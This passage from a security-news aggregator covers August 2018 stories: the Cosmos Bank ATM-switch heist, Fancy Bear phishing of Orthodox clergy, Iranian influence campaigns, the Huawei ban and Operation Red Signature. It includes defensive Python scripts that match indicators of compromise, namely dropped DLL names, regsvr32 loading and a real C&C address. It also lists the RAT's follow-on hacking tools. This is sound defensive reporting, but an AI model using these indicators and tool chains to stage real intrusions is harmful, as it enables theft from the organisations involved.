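2018-08-11T03:31:01|T1007|533333******3333|80.00|US|DECLINED
"""


def parse_log(text: str) -> list[Txn]:
    """Parse the constructed pipe-delimited format, skipping blanks and '#' comments."""
    txns = []
    for line in text.strip().splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, txn_id, card, amount, country, decision = line.split("|")
        txns.append(Txn(txn_id, card, float(amount), country,
                        datetime.fromisoformat(ts), decision))
    return txns


def reconcile(switch_txns: list[Txn], cbs_txns: list[Txn]) -> list[tuple[str, str]]:
    """Return (alert_type, txn_id) for every switch approval the CBS did not make."""
    cbs_by_id = {t.txn_id: t for t in cbs_txns}
    alerts = []
    for s in switch_txns:
        if s.decision != "APPROVED":
            continue
        c = cbs_by_id.get(s.txn_id)
        if c is None:
            alerts.append(("NO_CBS_AUTH", s.txn_id))      # CBS never saw the request
        elif c.decision != "APPROVED":
            alerts.append(("CBS_DECLINED", s.txn_id))     # CBS declined, switch approved
        elif abs(c.amount - s.amount) > 0.005:
            alerts.append(("AMOUNT_MISMATCH", s.txn_id))  # approved, but not for this amount
    return alerts


def multi_country_cards(switch_txns: list[Txn], window: timedelta = timedelta(hours=24),
                        min_countries: int = 3) -> dict[str, list[str]]:
    """Flag cards approved in >= min_countries countries inside one window (cloned-card pattern)."""
    by_card: dict[str, list[Txn]] = defaultdict(list)
    for t in switch_txns:
        if t.decision == "APPROVED":
            by_card[t.card].append(t)
    flagged = {}
    for card, txns in by_card.items():
        txns.sort(key=lambda t: t.ts)
        for i, first in enumerate(txns):
            countries = {t.country for t in txns[i:] if t.ts - first.ts <= window}
            if len(countries) >= min_countries:
                flagged[card] = sorted(countries)
                break
    return flagged


if __name__ == "__main__":
    switch, cbs = parse_log(SWITCH_LOG), parse_log(CBS_LOG)
    for alert in reconcile(switch, cbs):
        print("ALERT", *alert)
    for card, countries in multi_country_cards(switch).items():
        print("MULTI_COUNTRY", card, countries)
```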

On August 13, 2018, likely following lateral movement, the threat actor compromised LSO/RSO authentication in the Cosmos Bank's SWIFT SAA environment and used it to send three international wire transfer requests to ALM Trading Limited at Hang Seng Bank in Hong Kong, amounting to around $2 million.

“The ATM/POS banking switch that was compromised in the Cosmos Bank attack is a component that typically provides hosted ATM/POS terminal support, an interface to core banking solution (CBS) or another core financial system, and connectivity to regional, national or international networks. The primary purpose of the system is to perform transaction processing and routing decisions,” Securonix explains.

By focusing on the bank's infrastructure instead of basic card-not-present (CNP), jackpotting or blackboxing fraud, the well-planned, highly coordinated attack was able to effectively bypass the bank's layers of defense against ATM attacks.

The security firm attributes the attack to Lazarus, a group known for using Windows admin shares for lateral movement, custom command and control (C&C) servers that mimic TLS, Windows services for persistence, timestomping, and reflective DLL injection, along with other attack techniques.

Sacrilegious Spies: Russians Tried Hacking Orthodox Clergy
28.8.2018 securityweek BigBrothers

Russian Hackers Who Bedeviled 2016 U.S. Election Also Spied on Senior Orthodox Christian Figures

LONDON (AP) — The Russian hackers indicted by the U.S. special prosecutor last month have spent years trying to steal the private correspondence of some of the world's most senior Orthodox Christian figures, The Associated Press has found, illustrating the high stakes as Kiev and Moscow wrestle over the religious future of Ukraine.

The targets included top aides to Ecumenical Patriarch Bartholomew I, who often is described as the first among equals of the world's Eastern Orthodox Christian leaders.

The Istanbul-based patriarch is currently mulling whether to accept a Ukrainian bid to tear that country's church from its association with Russia, a potential split fueled by the armed conflict between Ukrainian military forces and Russia-backed separatists in eastern Ukraine.

The AP's evidence comes from a hit list of 4,700 email addresses supplied last year by Secureworks, a subsidiary of Dell Technologies.

The AP has been mining the data for months, uncovering how a group of Russian hackers widely known as Fancy Bear tried to break into the emails of U.S. Democrats, defense contractors, intelligence workers, international journalists and even American military wives. In July, as part of special counsel Robert Mueller's ongoing investigation into Russian interference in the 2016 U.S. election, a U.S. grand jury identified 12 Russian intelligence agents as being behind the group's hack-and-leak assault against Hillary Clinton's presidential campaign.

The targeting of high-profile religious figures demonstrates the wide net cast by the cyberspies.

Patriarch Bartholomew claims the exclusive right to grant a "Tomos of Autocephaly," or full ecclesiastic independence, sought by the Ukrainians. It would be a momentous step, splitting the world's largest Eastern Orthodox denomination and severely eroding the power and prestige of the Moscow Patriarchate, which has positioned itself as a leading player within the global Orthodox community.

Ukraine is lobbying hard for a religious divorce from Russia and some observers say the issue could be decided as soon as next month.

"If something like this will take place on their doorstep, it would be a huge blow to the claims of Moscow's transnational role," said Vasilios Makrides, a specialist in Orthodox Christianity at the University of Erfurt in Germany. "It's something I don't think they will accept."

The Kremlin is scrambling to help Moscow's Patriarch Kirill retain his traditional role as the head of the Ukrainian Orthodox Church and "the more they know, the better it is for them," Makrides said.

The Russian Orthodox Church said it had no information about the hacking and declined comment. Russian officials referred the AP to previous denials by the Kremlin that it has anything to do with Fancy Bear, despite a growing body of evidence to the contrary.

Ukrainian President Petro Poroshenko flew to Istanbul in April in an effort to convince the patriarch to agree to a split, which he has described as "a matter of our independence and our national security." Moscow's Patriarch Kirill is flying to Turkey later this week in a last-ditch bid to prevent it.

Hilarion Alfeyev, Kirill's representative abroad, has warned that granting the Tomos could lead to the biggest Christian schism since 1054, when Catholic and Orthodox believers parted ways.

"If such a thing happens, Orthodox unity will be buried," Alfeyev said.

The issue is an extraordinarily sensitive one for the Ecumenical Patriarchate. Reached by phone, spokesman Nikos-Giorgos Papachristou said: "I don't want to be a part of this story."

Other church officials spoke to the AP about the hacking on condition of anonymity, saying they did not have authorization to speak to the media.

Bartholomew, who is 78, does not use email, those church officials told AP. But his aides do, and the Secureworks list spells out several attempts to crack their Gmail accounts.

Among them were several senior church officials called metropolitans, who are roughly equivalent to archbishops in the Catholic tradition. Those include Bartholomew Samaras, a key confidante of the patriarch; Emmanuel Adamakis, an influential hierarch in the church; and Elpidophoros Lambriniadis, who heads a prestigious seminary on the Turkish island of Halki. All are involved in the Tomos issue; none returned recent AP messages seeking comment.

Spy games have long been a part of the Russian Orthodox world.

The Soviet Union slaughtered tens of thousands of priests in the 1930s, but the Communists later took what survived of the church and brought it under the sway of Russia's secret police, the KGB, with clerics conscripted to spy on congregants and emigres.

The nexus between Russia's intelligence and religious establishments survived the 1991 fall of the Soviet Union and the KGB's reorganization into the FSB, according to Moscow-based political analyst Dmitry Oreshkin.

"Our church leaders are connected to the FSB and their epaulettes stick out from under their habits," Oreshkin said. "They provide Vladimir Putin's policy with an ideological foundation."

That might make one target found by the AP seem curious: The Moscow Patriarch's press secretary, Alexander Volkov.

But Orthodox theologian Cyril Hovorun said he wouldn't be surprised to see a Russian group spying on targets close to home, saying, "they're probably checking him out just in case."

Volkov did not return AP emails seeking comment.

Hovorun is unusually qualified to speak on the issue. In 2012 he — like Volkov — was an official within the Moscow Patriarchate. But he resigned after someone leaked emails showing that he secretly supported independence-leaning Ukrainian clergy.

Hovorun has since been targeted by the Russian hackers, according to the data from Secureworks, which uses the name Iron Twilight to refer to the group.

Hovorun said he believes that those who published his emails six years ago weren't related to Fancy Bear, but he noted that their modus operandi — stealing messages and then publishing them selectively — was the same.

"We've known about this tactic before the hacking of the Democrats," Hovorun said, referring to the email disclosures that rocked America's 2016 presidential campaign. "This is a familiar story for us."

The Russian hackers' religious dragnet also extended to the United States and went beyond Orthodox Christians, taking in Muslims, Jews and Catholics whose activities might conceivably be of interest to the Russian government.

John Jillions, the chancellor of the Orthodox Church in America, provided the AP with a June 19, 2015, phishing email that Secureworks later confirmed was sent to him by Fancy Bear.

Fancy Bear also went after Ummah, an umbrella group for Ukrainian Muslims; the papal nuncio in Kiev; and an account associated with the Ukrainian Greek-Catholic Church, a Byzantine rite church that accepts the authority of the Vatican, the Secureworks data shows.

Also on the hit list: Yosyp Zisels, who directs Ukraine's Association of Jewish Organizations and Communities and has frequently been quoted defending his country from charges of anti-Semitism. Zisels said he had no knowledge of the attempted hacking. Vatican officials did not return messages.

Protestants were targeted too, including three prominent Quakers operating in the Moscow area.

Hovorun said Protestants were viewed with particularly intense suspicion by the Kremlin.

"There is an opinion shared by many in the Russian establishment that all those religious groups — like Quakers, evangelicals — they are connected to the American establishment," he said.

Secureworks' data shows hacking attempts on religious targets that took place in 2015 and 2016, but other material obtained by the AP suggests attempts to compromise the Ecumenical Patriarchate are ongoing.

On Oct. 16, 2017, an email purporting to come from Papachristou, who was just being appointed as spokesman, arrived in the inboxes of about a dozen Orthodox figures.

"Dear Hierarchs, Fathers, Brothers and Sisters in Christ!" it began, explaining that Papachristou was stepping into his new role as director of communications. "It's a very big joy for me to serve the Church on this position. Some suggestions on how to build up relations with the public and the press are provided in the file attached."

The file was rigged to install surveillance software on the recipients' computers.

The email's actual sender remains a mystery — independent analyses of the malicious message by Secureworks and its competitor CrowdStrike yielded nothing definitive.

Church officials told the AP they were disturbed by the hacker's command of church jargon and their inside knowledge of Papachristou's appointment.

"The one who made this is someone who knows us," one official said.

Priests and prelates don't make obvious targets for cyberespionage, but the stakes for the Kremlin are high as the decision on Tomos looms.

Granting the Ukrainian church full independence "would be that devastating to Russia," said Daniel Payne, a researcher on the board of the J.M. Dawson Institute of Church-State Studies at Baylor University in Texas.

"Kiev is Jerusalem for the Russian Orthodox people," Payne said. "That's where the sacred relics, monasteries, churches are ... it's sacred to the people, and to Russian identity."

Australia banned Huawei from 5G network due to security concerns
25.8.2018 securityaffairs BigBrothers

Chinese-owned telecommunications firm Huawei has been banned from Australia's 5G network due to security concerns.
The Australian government considers Huawei's involvement in the rollout of next-generation 5G communication networks too risky.

Huawei Australia called the decision disappointing.

Huawei Australia wrote on Twitter (1:36 AM, Aug 23, 2018):

"We have been informed by the Govt that Huawei & ZTE have been banned from providing 5G technology to Australia. This is an extremely disappointing result for consumers. Huawei is a world leader in 5G. Has safely & securely delivered wireless technology in Aust for close to 15 yrs"

The Chinese company was founded by a former People's Liberation Army official in 1987.

The US was the first country that warned of the security risks associated with the usage of the products manufactured by the Chinese telecommunications giant.

The Chinese firm denies having shared Australian customer data with Chinese intelligence, but that is not enough for the Australian Government.

Australian authorities also banned the Chinese firm ZTE Corp.

Huawei Australia Chairman John Lord explained in June that banning one of the world’s leading 5G suppliers could impact Australia’s economic growth and productivity for generations.

The Chinese Government is concerned about the decision of the Australian Government.

"We urge the Australian government to discard ideological biases and create a level-playing field for Chinese companies' operations in Australia," said Foreign Ministry spokesman Lu Kang.

In May, the Pentagon ordered retail outlets on US military bases to stop selling Huawei and ZTE products due to the unacceptable security risk they pose.

The Pentagon considers the security risk posed by the adoption of devices manufactured by the Chinese firms unacceptable; US officials believe the smartphones could be used to spy on military personnel.

“Huawei and ZTE devices may pose an unacceptable risk to the department’s personnel, information and mission,” said Pentagon spokesman Major Dave Eastburn.

“In light of this information, it was not prudent for the department’s exchanges to continue selling them.”

In February, Dan Coats, the Director of National Intelligence, along with several other top intel officials, urged Americans to avoid buying Huawei and ZTE products.

Google Blocks Accounts in 'Influence Operation' Linked to Iran
24.8.2018 securityweek BigBrothers

Google said Thursday it blocked YouTube channels and other accounts over a misinformation campaign linked to Iran, on the heels of similar moves by Facebook and Twitter.

Google said that working with the cybersecurity firm FireEye, it linked the accounts to the Islamic Republic of Iran Broadcasting as part of an effort dating to at least January 2017.

"We identified and terminated a number of accounts linked to the IRIB organization that disguised their connection to this effort," Google vice president Kent Walker said in a statement.

"Actors engaged in this type of influence operation violate our policies, and we swiftly remove such content from our services and terminate these actors' accounts."

Google became the latest online service to crack down on misinformation efforts stemming from Russia and Iran, with the apparent aim of sowing discord and confusion ahead of the November US elections.

The tech giant said it blocked 39 YouTube channels that had racked up a total of 13,466 views in the US on "relevant videos" and disabled six accounts at Blogger and 13 accounts at its Google+ social network.

"In addition to the intelligence we received from FireEye, our teams have investigated a broader range of suspicious actors linked to Iran who have engaged in this effort," Google said.

Phishing season

Google also said it has blocked state-sponsored phishing attacks in which deceptive messages were sent to users of its free email service in an effort to trick people into disclosing information such as passwords.

"In recent months, we've detected and blocked attempts by state-sponsored actors in various countries to target political campaigns, journalists, activists, and academics located around the world," Google said.

The California-based internet giant added that in the past year it has intensified defenses against "actors linked to" the Russia-backed Internet Research Agency (IRA).

Google has removed YouTube channels and a Blogger account as a result of monitoring IRA activities, according to the company. A FireEye report released on Thursday detailed its findings and expressed confidence in attributing influence campaigns to Iran.

Evidence included phone numbers, website registration information, and promotion of content in sync with Iranian political interests, according to the report.

"The activity we have uncovered highlights that multiple actors continue to engage in and experiment with online, social media driven influence operations as a means of shaping political discourse," FireEye said.

"These operations extend well beyond those conducted by Russia."

Coordinated manipulation

Facebook this week revealed that it removed more than 650 pages, groups and accounts identified as "networks of accounts misleading people about what they were doing."

The accounts, some on Facebook-owned Instagram, were presented as independent news or civil society groups but were actually working in coordinated efforts, the company said.

The social network giant said some of the pages were tied to groups previously linked to Russian intelligence operations.

Separately, Twitter said it suspended 284 accounts "for engaging in coordinated manipulation," adding that "it appears many of these accounts originated from Iran."

Former Facebook security chief Alex Stamos said in a blog post Wednesday that gaping holes remain in online platforms.

Stamos, who left Facebook this month to join Stanford University, said that "the United States has broadcast to the world that it doesn't take these issues seriously...While this failure has left the US unprepared to protect the 2018 elections, there is still a chance to defend American democracy in 2020."

Microsoft last week seized websites it linked to Russian intelligence that sought to meddle in US political debate.

Australia Bans Huawei From 5G Network Over Security Concerns
24.8.2018 securityweek BigBrothers

CANBERRA, Australia (AP) — Chinese-owned telecommunications giant Huawei has been blocked from rolling out Australia's 5G network due to security concerns.

The government said Thursday that the involvement of a company "likely to be subject to extrajudicial directions from a foreign government" presented too much risk.

Several governments have been scrutinizing Huawei over its links to the Chinese government. The private Chinese company started by a former People's Liberation Army major in 1987 suffered a setback in the U.S. market in 2012 when a congressional report said it was a security risk and warned phone companies not to buy its equipment.

Huawei has said it would never hand over Australian customer data to Chinese spy agencies, but the government's statement said no combination of security controls sufficiently mitigated the risk.

Acting Home Affairs Minister Scott Morrison said the government was committed to protecting 5G networks.

The decision also affects ZTE Corp, a Chinese maker of mobile devices.

Shenzhen-based Huawei, the world's largest telecommunications equipment supplier, had been banned from bidding for contracts for Australia's broadband network in 2011.

5G networks will start commercial services in Australia next year.

Huawei Australia tweeted that the decision was "extremely disappointing." Huawei Australia Chairman John Lord had said in June that rejecting one of the world's leading 5G suppliers could impact Australia's economic growth and productivity for generations.

In Beijing, Foreign Ministry spokesman Lu Kang expressed "serious concerns" about the decision and accused the Australian government of "making up excuses to create hurdles deliberately and taking discriminative measures in this regard.

"We urge the Australian government to discard ideological biases and create a level playing field for Chinese companies' operations in Australia," Lu told reporters at a daily briefing.

The U.S. House Intelligence Committee previously found that Huawei and ZTE, which is partly state-owned, were tied to the Chinese government and that both companies failed to provide responsive and detailed answers about those relationships and about their U.S. operations.

Huawei denied being financed to undertake research and development for the Chinese military, but the committee said it had received internal Huawei documents showing the company provided special network services to an entity alleged to be an elite cyber-warfare unit within the People's Liberation Army.

Lord, of Huawei Australia, at the time urged Australia not to be swayed by the U.S. report, which he said was about protectionism rather than security.

Attempt to Break Into Democratic Party Voter Data Thwarted
23.8.2018 securityweek BigBrothers

An attempt to break into the Democratic National Committee’s massive voter database has been thwarted, a party official said Wednesday, two years after Russian operatives sent the party into disarray by hacking into its computers and facilitating the release of tens of thousands of emails amid the presidential election.

A web security firm using artificial intelligence uncovered the attempt. The DNC was notified Tuesday, it said. Hackers had created a fake login page to gather usernames and passwords in an effort to gain access to the Democratic Party’s voter file, a party official said. The file contains information on tens of millions of voters. The attempt was quickly thwarted by suspending the attacker’s account, and no information was compromised, the official said. The FBI was notified.

The official wasn’t authorized to speak about sensitive security information and spoke to The Associated Press on condition of anonymity.

Government and tech officials say it’s too early to know who was behind the attempt. The FBI declined to comment to the AP.

The attempt comes as Democrats gather for their summer meeting. The party’s cybersecurity has been an issue since the 2016 presidential election, when Russian hackers compromised DNC servers and publicly revealed internal communications that exploited divisions between Bernie Sanders’ and Hillary Clinton’s campaigns as the two candidates vied for the Democratic presidential nomination. Hackers also accessed the email accounts of Clinton’s campaign chairman, John Podesta, and systematically released the contents throughout the fall campaign.

It also comes a day after Microsoft announced it had uncovered similarly fraudulent websites created by Kremlin agents that spoofed two conservative outfits that are foes of Russia’s president, Vladimir Putin, presumably to trick unwitting visitors into surrendering credentials.

Bob Lord, the DNC’s chief security officer, said the attempt showed how serious the cyberthreat is and why it’s critical that state and federal officials work together on security.

“This attempt is further proof that there are constant threats as we head into midterm elections and we must remain vigilant in order to prevent future attacks,” Lord said in a statement.

He said President Donald Trump isn’t doing enough to protect American democracy. Previously, Trump mocked the DNC’s cybersecurity and cast doubt on U.S. intelligence officials’ findings that Russia was involved.

At a previously scheduled election security briefing Wednesday, Homeland Security Secretary Kirstjen Nielsen said the quick response to the attempted DNC hack showed that the system was working “and that different entities understand who to reach out to.”

“Any attack on a political party or a campaign is important for us all to take seriously,” she said, emphasizing the government was doing all it could to help protect election systems ahead of the midterm elections. At stake is control of Congress, which could potentially switch from Republican to Democrat.

Amid the news, a Senate committee abruptly postponed a Wednesday vote on legislation to help states protect against election hacking, frustrating Democrats and at least one Republican on the panel.

The vote was put off by the Senate Rules and Administration Committee after a bipartisan group of lawmakers spent months negotiating the legislation. The bill would aim to protect state election infrastructure by requiring that all states use backup paper ballots and conduct audits after elections, among other measures. It would also require DHS to immediately notify states if the federal government is aware that a state election system has been breached.

A Senate Republican aide said the vote was postponed because secretaries of state had complained about certain provisions, including the type of audits the bill would require. The aide said additional Republican support would be necessary to move the legislation out of committee. The aide was not authorized to speak about the committee’s reasoning and spoke on condition of anonymity.

Republican Sen. James Lankford of Oklahoma, one of the bill’s sponsors, said after the vote’s postponement: “Congressional inaction is unacceptable.”

The bill “will help states take necessary steps to further prepare our election infrastructure for the possibility of interference from not just Russia, but other possible adversaries like Iran or North Korea or a hacktivist group,” Lankford said.

The DNC attempt wasn’t mentioned at a Senate hearing on election security Wednesday, according to senators who were present.

States have been scrambling to secure their election systems since it was revealed that Russian hackers targeted election systems in at least 21 states in 2016, though the number is likely greater. There has been no indication any vote tallies were changed. Nielsen said at the briefing that states should have auditing systems in part as a safeguard so the public knows the vote tallies can be trusted.

In Tuesday’s incident, a scanning tool deployed by the San Francisco security company Lookout detected a masquerading website designed to harvest the passwords of users of the login page of NGP VAN, a technology provider used by the Democrats and other liberal-leaning political organizations, said Mike Murray, the company’s vice president of security intelligence. He said he contacted the DNC.

The tool, which leverages artificial intelligence, has been in development for a year and wasn’t tasked to scan any sites in particular but instead to identify phishing sites based on typical attributes, Murray said.

“This is the beauty of AI: It finds things that humans don’t know to look for,” he said.

He said the tool notified Lookout before the impostor page had even been populated with content. “As soon as we realized how fast it was developing, I decided to reach out to contacts that I know at the DNC.” Murray also contacted the website hosting company, Digital Ocean.

Ross Rustici, senior director for intelligence services at Cybereason in Boston, said a voter database is a juicy target for anyone trying to exacerbate political divisions in the U.S. or gain insight on political opponents.

“The data housed in these types of databases would be incredibly useful both for domestic opposition research as well as for foreign intelligence and counterintelligence purposes,” he said.

Operation Red Signature – South Korean Firms victims of a supply chain attack
23.8.2018 securityaffairs BigBrothers

Supply Chain Attack Hits South Korean Firms
Security researchers from Trend Micro have uncovered a supply chain attack, tracked as Operation Red Signature, against organizations in South Korea.
Operation Red Signature aimed to deliver a remote access Trojan (RAT) that the attackers used to steal sensitive information from the victims.

Threat actors compromised the update server of a remote support solutions provider and used it to infect the victims with the 9002 RAT backdoor.

“Together with our colleagues at IssueMakersLab, we uncovered Operation Red Signature, an information theft-driven supply chain attack targeting organizations in South Korea. We discovered the attacks around the end of July, while the media reported the attack in South Korea on August 6.” reads the analysis published by TrendMicro.

The malicious code delivered by the attackers was signed with a valid, stolen digital certificate. The attackers also changed the configuration of the update server so that the malware was delivered only to organizations within a specified range of IP addresses.

According to Trend Micro, the attackers likely stole the code signing certificate in April, used it to sign the malicious update files, and then uploaded them to their own servers.

The hackers then compromised the server used to deliver the update and configured it to retrieve an update.zip file from the server controlled by the attackers.

Researchers observed that the 9002 RAT was also used to deliver additional payloads, such as an exploit tool for Internet Information Services (IIS) 6 WebDav (exploiting CVE-2017-7269) and an SQL database password dumper.

The hackers used these tools to steal data stored on their targets’ web servers and databases.


“The update.zip file contains an update.ini file, which has the malicious update configuration that specifies the remote support solution program to download file000.zip and file001.zip and extract them as rcview40u.dll and rcview.log to the installation folder.” continues the analysis.

“The program will then execute rcview40u.dll, signed with the stolen certificate, with Microsoft register server (regsvr32.exe). This dynamic-link library (DLL) is responsible for decrypting the encrypted rcview.log file and executing it in memory. 9002 RAT is the decrypted rcview.log payload, which connects to the command-and-control (C&C) server at 66[.]42[.]37[.]101.”

The analysis of the 9002 RAT backdoor revealed it was compiled on July 17, 2018, and the configuration files inside update.zip were created on July 18, the same day the remote support program’s update process started. The experts also noticed that the 9002 RAT used in the supply chain attack was configured to be inactive in August.
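
The execution chain the article describes (rcview40u.dll and rcview.log written to the install folder, regsvr32.exe loading the DLL, the resulting process contacting the reported C&C) can be correlated on the endpoint. The following detection logic is an added example, not Trend Micro's or IssueMakersLab's code; the telemetry line format, the host names and the assumption that the C&C connection originates from the regsvr32.exe process hosting the DLL are constructed for the example, while the file names, loader and C&C address are those reported above.

```python
"""Endpoint-side detection of the Operation Red Signature execution chain.

Added example; not Trend Micro's or IssueMakersLab's code. The file names,
the use of regsvr32.exe and the C&C address come from the article. The
telemetry format, host names and the assumption that the RAT's C&C
connection is made by the regsvr32.exe process hosting the DLL are
constructed for this example.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

DROPPED_FILES = {"rcview40u.dll", "rcview.log"}  # written to the install folder
LOADER = "regsvr32.exe"                          # executes the signed DLL
C2_ADDRESS = "66.42.37.101"                      # C&C reported for 9002 RAT

# Constructed telemetry: "timestamp|host|event|pid|detail". WS-17 shows the
# full chain; WS-22 is a benign regsvr32.exe use that must not alert.
SAMPLE_LOG = [
    r"2018-07-18T09:01:02Z|WS-17|file_create|4120|C:\Program Files\RemoteSupport\rcview40u.dll",
    r"2018-07-18T09:01:03Z|WS-17|file_create|4120|C:\Program Files\RemoteSupport\rcview.log",
    r'2018-07-18T09:01:05Z|WS-17|process_create|5008|regsvr32.exe /s "C:\Program Files\RemoteSupport\rcview40u.dll"',
    r"2018-07-18T09:01:09Z|WS-17|net_connect|5008|66.42.37.101:443",
    r"2018-07-18T09:05:00Z|WS-22|process_create|6100|C:\Windows\System32\regsvr32.exe /s C:\Windows\System32\example.dll",
    r"2018-07-18T09:05:01Z|WS-22|net_connect|6100|10.0.0.5:443",
]


@dataclass
class Event:
    ts: str
    host: str
    kind: str    # file_create | process_create | net_connect
    pid: int
    detail: str  # file path, command line, or "ip:port"


def parse_line(line: str) -> Event:
    """Parse one pipe-separated telemetry line (constructed format)."""
    ts, host, kind, pid, detail = line.split("|", 4)
    return Event(ts, host, kind, int(pid), detail)


def _basename(path: str) -> str:
    """Last path component, accepting either separator."""
    return path.rsplit("\\", 1)[-1].rsplit("/", 1)[-1]


def detect(lines: List[str]) -> Dict[str, List[str]]:
    """Return {host: [stages seen, in order]} for hosts showing any stage.

    Stages: 'dropped_file'  - rcview40u.dll or rcview.log written
            'regsvr32_load' - regsvr32.exe started with rcview40u.dll on its command line
            'c2_connect'    - a regsvr32.exe process connecting to the reported C&C
    """
    stages: Dict[str, List[str]] = defaultdict(list)
    loader_pids: Set[Tuple[str, int]] = set()  # (host, pid) of regsvr32.exe processes

    def note(host: str, stage: str) -> None:
        if stage not in stages[host]:
            stages[host].append(stage)

    for raw in lines:
        if not raw.strip():
            continue
        ev = parse_line(raw.strip())
        detail = ev.detail.lower()
        if ev.kind == "file_create":
            if _basename(detail) in DROPPED_FILES:
                note(ev.host, "dropped_file")
        elif ev.kind == "process_create":
            # The image is the first token; the sample command lines have no
            # spaces in the image path, so a plain split is enough here.
            image = _basename(detail.split(" ", 1)[0])
            if image == LOADER:
                loader_pids.add((ev.host, ev.pid))
                if "rcview40u.dll" in detail:
                    note(ev.host, "regsvr32_load")
        elif ev.kind == "net_connect":
            if (ev.host, ev.pid) in loader_pids and detail.split(":")[0] == C2_ADDRESS:
                note(ev.host, "c2_connect")
    return dict(stages)


def severity(observed: List[str]) -> str:
    """C&C contact, or two or more stages together, is high; one stage alone is medium."""
    if "c2_connect" in observed or len(observed) >= 2:
        return "high"
    return "medium" if observed else "none"


if __name__ == "__main__":
    for host, seen in detect(SAMPLE_LOG).items():
        print(f"{host}: {severity(seen)} ({', '.join(seen)})")
```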

The RAT can fetch a long list of hacking tools; the files that 9002 RAT retrieves and delivers to the affected system are listed below, as filename (tool): purpose.

dsget.exe (DsGet): view Active Directory objects
dsquery.exe (DsQuery): search for Active Directory objects
sharphound.exe (SharpHound): collect Active Directory information
aio.exe (All In One, AIO): publicly available hack tool
ssms.exe (SQL password dumper): dump passwords from a SQL database
printdat.dll (RAT, PlugX variant): remote access tool
w.exe (IIS 6 WebDAV exploit tool): exploit tool for CVE-2017-7269 (IIS 6)
Web.exe (WebBrowserPassView): recover passwords stored by the browser
smb.exe (scanner): scans the system’s Windows version and computer name
m.exe (custom Mimikatz, including 32-bit and 64-bit files): verify computer passwords and Active Directory credentials

“Supply chain attacks don’t just affect users and businesses — they exploit the trust between vendors and their clients or customers. By trojanizing software/applications or manipulating the infrastructures or platforms that run them, supply chain attacks affect the integrity and security of the goods and services that organizations provide,” Trend Micro concludes.

Iran-Linked Influence Campaign Targets US, Others
22.8.2018 securityweek BigBrothers

Threat actors apparently working out of Iran have been conducting an operation whose goal is to influence the opinions of people in the United States and other countries around the world, FireEye reported on Tuesday.

This campaign, which the cybersecurity firm describes as an “influence operation,” involves a network of “inauthentic” news websites and clusters of social media accounts whose apparent purpose is to “promote political narratives in line with Iranian interests.”

The sites that FireEye calls “inauthentic” make an effort to hide their origins and affiliations, and rely on fake social media personas to promote content. This content is either original, copied from other sources, or taken from other sources and modified.

The campaign, which has been active since at least 2017, focuses on anti-Israel, anti-Saudi, and pro-Palestine topics. The threat actor behind the operation has also distributed stories regarding U.S. policies that are favorable to Iran, including the Joint Comprehensive Plan of Action nuclear deal.

In addition to the United States, the group’s targets include the United Kingdom, Latin America and the Middle East.

FireEye researchers have found several pieces of evidence suggesting that Iran is behind the operation. This includes domains registered with email addresses associated with Iranian organizations, Twitter accounts registered with phone numbers with Iran’s +98 country code, and online personas promoting Iranian holidays.

However, the company says it’s only “moderately confident” that Iran is behind the activity, mainly because this is an influence operation, and such operations are by nature meant to be deceptive.

The cybersecurity firm noted that the Iran-linked threat actor tracked as APT35, NewsBeef, Newscaster and Charming Kitten has also leveraged these types of inauthentic news sites and social media personas in its cyber espionage operations, but there is no evidence that this influence campaign has been conducted by APT35.

“The activity we have uncovered is significant and demonstrates that actors beyond Russia continue to engage in online, social media-driven influence operations as a means of shaping political discourse,” said Lee Foster, Manager of Information Operations Analysis at FireEye. “It also illustrates how the threat posed by such influence operations continues to evolve, and how similar influence tactics can be deployed irrespective of the particular political or ideological goals being pursued.”

FireEye is preparing a report containing technical details on the operation. The report will be shared on request.

Microsoft Disrupts Election-Related Domains Used by Russian Hackers
22.8.2018 securityweek BigBrothers

Microsoft on Monday announced that it took control of several domains associated with a notorious Russia-linked threat actor. The names of the domains suggest the hackers may have been using them in campaigns related to the upcoming midterm elections in the United States.

The tech giant’s Digital Crimes Unit obtained a court order to take control of six domains created by a threat group tracked as APT28, Fancy Bear, Pawn Storm, Strontium, Sednit, Tsar Team and Sofacy.

APT28, which experts believe is sponsored by Russia’s GRU intelligence agency, has been known to launch politics-focused campaigns, including ones aimed at the latest presidential elections in the United States and France. The group may now be targeting the upcoming midterm elections in the U.S.

The domains seized by Microsoft are my-iri.org, hudsonorg-my-sharepoint.com, senate.group, adfs-senate.services, adfs-senate.email and office365-onedrive.com.

The first domain appears to mimic the International Republican Institute, a non-profit that receives funding from the U.S. government to promote democracy around the world. The second domain appears to impersonate the Hudson Institute, a politically conservative non-profit think tank. The other domains mimic the website of the U.S. Senate and Microsoft’s Office 365 service.

While the domains may have been set up for election-related campaigns, Microsoft says it currently has no evidence that any of them were successfully used in attacks, and it’s unclear exactly whom the hackers intended to target using these domains.

The company revealed last month that it had spotted some Microsoft phishing domains that had apparently been set up as part of attacks aimed at the campaigns of three congressional candidates who are running in the upcoming midterm elections.

“Microsoft has notified both nonprofit organizations. Both have responded quickly, and Microsoft will continue to work closely with them and other targeted organizations on countering cybersecurity threats to their systems. We’ve also been monitoring and addressing domain activity with Senate IT staff the past several months, following prior attacks we detected on the staffs of two current senators,” Brad Smith, Microsoft’s president and chief legal officer, said in a blog post.

This is not the first time Microsoft has seized domains used by APT28. The company says it has used court orders a total of 12 times over the past two years to shut down 84 fake websites linked to the threat group.

Sean Sullivan, Security Advisor at F-Secure, cautioned that the domains targeted by Microsoft may not necessarily be related to elections.

“Microsoft’s announcement is generating a lot of attention and the focus is overwhelmingly centered on the 2018 mid-term elections. But it’s important not to lose sight of the bigger issue,” Sullivan told SecurityWeek. “The focus on think tanks holding pro-sanction views on Russia’s current regime is about espionage. In short: spies are going to spy. That’s true whether or not it’s an election year. There seems to be a rush to conclude that these six domains are part of an “attack” on the elections that risks missing the complete threat model – and therefore the complete countermeasures that should be taken.”

Microsoft took this opportunity to announce its new AccountGuard initiative, which provides free cybersecurity protection to candidates, campaigns and political institutions using Office 365.

The AccountGuard service, which is part of Microsoft’s Defending Democracy Program, involves notifications about threats, security guidance and education, and the opportunity to test preview releases of new security features.

AccountGuard is currently available only in the United States, but Microsoft plans on offering it in other countries as well in the coming months.

Hacking Elections: Georgia's Midterm Electronic Voting in the Dock
22.8.2018 securityweek BigBrothers

